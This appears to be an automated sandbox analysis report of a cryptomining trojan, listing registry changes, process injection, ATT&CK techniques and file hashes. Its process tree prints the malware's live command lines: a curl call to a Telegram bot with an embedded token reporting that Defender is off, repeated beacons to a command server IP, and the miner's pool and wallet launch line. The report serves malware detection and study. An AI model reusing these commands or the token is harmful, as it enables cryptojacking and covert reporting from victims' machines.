Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0"	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

explorer.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
3036	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2224	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
2548	explorer.exe
3396	explorer.exe
3396	explorer.exe
3396	explorer.exe
3396	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exeexplorer.exeRegHost.exe

description	pid	process	target process
PID 4052 wrote to memory of 3736	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	curl.exe
PID 4052 wrote to memory of 3736	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	curl.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3428	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	bfsvc.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 4052 wrote to memory of 3036	4052	b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe	explorer.exe
PID 3036 wrote to memory of 528	3036	explorer.exe	curl.exe
PID 3036 wrote to memory of 528	3036	explorer.exe	curl.exe
PID 3036 wrote to memory of 3608	3036	explorer.exe	RegHost.exe
PID 3036 wrote to memory of 3608	3036	explorer.exe	RegHost.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2580	3608	RegHost.exe	bfsvc.exe
PID 3608 wrote to memory of 2224	3608	RegHost.exe	explorer.exe
PID 3608 wrote to memory of 2224	3608	RegHost.exe	explorer.exe
PID 3608 wrote to memory of 2224	3608	RegHost.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe
"C:\Users\Admin\AppData\Local\Temp\b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b.exe"
1⤵
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\SYSTEM32\curl.exe
curl "https://api.telegram.org/bot5061239852:AAEeHA8AgcWGoZHszoBHCLNqDLAR4913X8k/sendMessage?chat_id=-1001645483216&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: EasyMiner%0A(Windows Defender has been turned off)"
2⤵
PID:3736

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3428

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
3⤵
PID:528

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3608

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2580

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2224

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
5⤵
PID:1020

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3972

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2260

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2548

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
7⤵
PID:2604

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1292

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
8⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3916

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3396

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
9⤵
PID:3016

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3152

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:544

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
10⤵
PID:1232

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
11⤵
PID:1836

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3576

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
12⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2804

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
12⤵
PID:1324

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
13⤵
PID:3768

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
13⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3776

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
14⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1468

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
14⤵
PID:1308

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
15⤵
PID:3476

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
15⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1772

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
16⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2160

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
16⤵
PID:3048

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
17⤵
PID:3628

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
17⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3632

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
18⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2940

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
18⤵
PID:528

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
19⤵
PID:3916

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
19⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1540

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
20⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3028

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
20⤵
PID:1588

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
21⤵
PID:3284

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
21⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3492

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
22⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:868

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
22⤵
PID:224

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
23⤵
PID:3836

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
23⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1680

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
24⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2464

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
24⤵
PID:3992

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
25⤵
PID:1292

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
25⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3500

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
26⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1888

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
26⤵
PID:1332

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
27⤵
PID:3016

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
27⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3540

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
28⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1600

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
28⤵
PID:2700

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
29⤵
PID:3028

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
29⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1572

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
30⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1412

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
30⤵
PID:3180

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
31⤵
PID:2600

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
31⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:224

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
32⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3456

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
32⤵
PID:2288

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
33⤵
PID:780

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
33⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:564

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x9dEbea19ca7c4Af9B41c6A4F1DC7fa9541AE9696 -coin etc -worker EasyMiner_Bot -cclock +500 -cvddc +500
34⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3140

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "EasyMiner" "etc"
34⤵
PID:1588

C:\Windows\SYSTEM32\curl.exe
curl "http://185.137.234.33:8000/core.php?u_key=easyminer_def&gpu=Microsoft%20Basic%20Display%20Adapter&worker=EasyMiner&coin=etc&hash=0.0"
35⤵
PID:1180

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
35⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2784

C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
1⤵
- Checks processor information in registry
PID:2836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
535a9e5a816025c2c296976561827b7c2da468bf32d168a248e1a3152cd1e65b0b07680198faa4bf1e51de6b816fc2807d37fce5526afd603ca1cd3e653ca62f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
a3578b5feeea4db90bcb5315f769e84d

SHA1
436a4a014f91c138ed9019c58c5c98ada78a7f4f

SHA256
b741574c43d9af88a6b410ae8d8bd175fbbb12f55b189e05be36ff923844d75b

SHA512
